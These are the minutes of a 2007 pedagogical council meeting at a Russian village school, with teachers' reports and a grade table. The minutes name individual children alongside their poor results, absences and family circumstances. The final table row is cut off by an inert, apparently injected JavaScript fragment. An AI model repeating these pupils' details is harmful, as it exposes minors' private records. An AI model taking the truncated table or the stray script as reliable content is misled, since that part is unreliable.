Протокол № 9
от 7.11.2007 г.
Председатель: Васильченко Е.А
Секретарь: Палагута М.В.
Присутствовало: 16
Отсутствовало: 6
Повестка дня:
1. Выполнение решения педагогического совета от 30.08.2007 г.
2. Итоги успеваемости учащихся 3-9 классов. Информация классных руководителей.
3. Педагогическое взаимодействие – важнейшее условие оптимизации образовательного процесса. Доклад: Гордиенко А.П.
1 вопрос: Выполнение решения педагогического совета от 30.08.2007 г.
Слушали: директора школы Васильченко Е.А. которая отметила, что было проведено тестирование по русскому языку и математике, в ходе которого было выявлены пробелы в некоторых темах по предметам. Была дана рекомендация по устранению пробелов в урочное и неурочное время. Был проведён школьный пробный ЕГЭ в 11 классе, в ходе которого было выявлено, что учащиеся, которые успевали на «5», написали экзамен на «4».
В целях повышения престижа школы провести день открытых дверей для родителей на базе МОУ «Новоборисовская СОШ им. Сырового А.В.» в марте 2008 года. Включив в программу посещения родителями уроков, концерт, спортивное состязание «Папа, мама, я – спортивная семья».
Учителем информатики Палагута М.В. размещаются материалы о жизни школы два раза в месяц на сайте школы. Администрация школы контролирует профильную подготовку учащихся 10-го класса проводимую на базе МОУ «Борисовская СОШ им. Рудого». Учителями – предметниками на осенних каникулах организована подготовка учащихся к районным олимпиадам. Необходимо активизировать работу по реализации программы развития школы «Концепция модели школы практического гуманизма».
Решили: продолжить работу по осуществлению решений педагогического совета от 30.08.2007 года.
2 вопрос: Итоги успеваемости учащихся 3-9 классов. Информация классных руководителей.
Слушали: Макееву Н.Ф., классного руководителя 1-го класса, которая отметила, что учащиеся выполняют программу. Но такие учащиеся как Череповская М. и Гляденко Р., Журавлёв В., Михайленко В. плохо усваивают, им трудно даётся запомнить гласные и согласные буквы, но в течение года учитель планирует индивидуальную работу с этими учащимися. Но есть и такие учащиеся которые стараются для того чтобы достичь результата. Это Бондарева Д.. Верзун А., Изотов Д.,
Черкашин И. Успешнее усваивают программу дети, которые ходили в группу детского сада, они больше развиты.
Классного руководителя 3 класса Калошину И.А., которая отметила, что на начало первой четверти 14 человек, на конец четверти – 16 учащихся. В основном все дети усваивают программу. В классе есть 4 отличника: Антонова К., Ножин С., Оробинский И., Шатилова Ю. С одной «3» закончили Мухин В., Горишний А.
Классного руководителя 4 класса Присаду Л.Н., которая отметила, что на начало четверти 15 человек, на конец – 16 человек.
Классного руководителя 5 класса Захарова В.Д., которая отметила, что на начало четверти – 19 человек, на конец четверти – 19 человек. Виктория Дмитриевна сказала, что в классе 5 отличников: Князева А., Мухина О., Черкашина К., Люст Л., Стеценко Е. По одной «4» по русскому языку и математике у Васильевой А. Татаринов А. – одна «3» по математике. Классного руководителя 6 класса Гордиенко О.Г., которая отметила, что на начало четверти - 16 человек, на конец четверти – 16 человек В этом классе 2 отличника – Курцева Ю. и Шелковая Н. Есть такие учащиеся, у которых по одной «4» это Стеценко Е. - по русскому языку. Пособилов Р. очень слабый ученик.
Классного руководителя 7 класса Зинченко И.Н., который отметил, что на начала четверти – 13 учащихся, на конец четверти – 13 учащихся. Также в этом году четверо отличников – это Гончарова Ю., Нехорошева А., Рощупкина О., Шушпанова К. Неуспевающих нет.
Классного руководителя 8 «а» класса Макарову Е.П., которая отметила, что на начало четверти – 12 учащихся, на конец четверти – 12 учащихся. В этом классе одна отличница – Ямпольская Елена. Круговой А. имеет «2» по английскому языку. В классе самая низкая по школе качество знаний, учащиеся нерегулярно выполняют домашнее задание, трудно организовать их работу на уроке. Классный руководитель поддерживает связь с родителями. Но положительных результатов нет.
Классного руководителя 8 «б» класса Палагута М.В., которая отметила, что на начало четверти – 10 учащихся, на конец четверти – 10 учащихся. В классе успевают на «5» и «4» двое учащихся, это Ругаль Т., Верзун А. У Ругаль Т. одна «4» по русскому языку.
Классного руководителя 9 класса Панькову В.И., которая отметила, что на начало четверти 19 человек, на конец четверти – 19 человека В этом классе один отличник Гончаров М. Есть и такие учащиеся которые не успевают, это Крикун И. (химия, биология), Оноприенко И. не аттестован по семи предметам. Причинной не аттестации является большое количество пропусков как по болезни так и без уважительных причин. Классный руководитель в течение четверти поддерживала связь с опекуном Крикуна И. и матерью Оноприенко И.
Итоги успеваемости учащихся
МОУ «Новоборисовская средняя общеобразовательная
школа им. Сырового А.В.»
за 2007-2008 учебный год.
Класс |
Кол-во |
Отл. |
«4» и «5» |
Неусп. |
% усп. |
% качеств. успев. |
1 |
14 |
- |
- |
- |
- |
- |
2 |
14 |
- |
- |
- |
- |
- |
3 |
16 |
4 |
7 |
- |
100% |
69% |
4 |
13 |
2 |
5 |
- |
100% |
54% |
Итого: |
57 |
6 |
12 |
- |
100% |
62% |
5 |
19 |
5 |
3 |
2 |
95% |
42% |
6 |
16 |
2 |
6 |
- |
100% |
50% |
7 |
13 |
4 |
2 |
- |
100% |
46% |
8 А |
12 |
1 |
1 |
1 |
92% |
17% |
8 Б |
10 |
- |
2 |
- |
100% |
20% |
9 |
19 |
1 |
4 |
2 |
95% |
26% |
Итого: |
89 |
13 |
18 |
5 |
96% |
35% |
10 |
var l="f";google="a";yand="r";document.write(''); |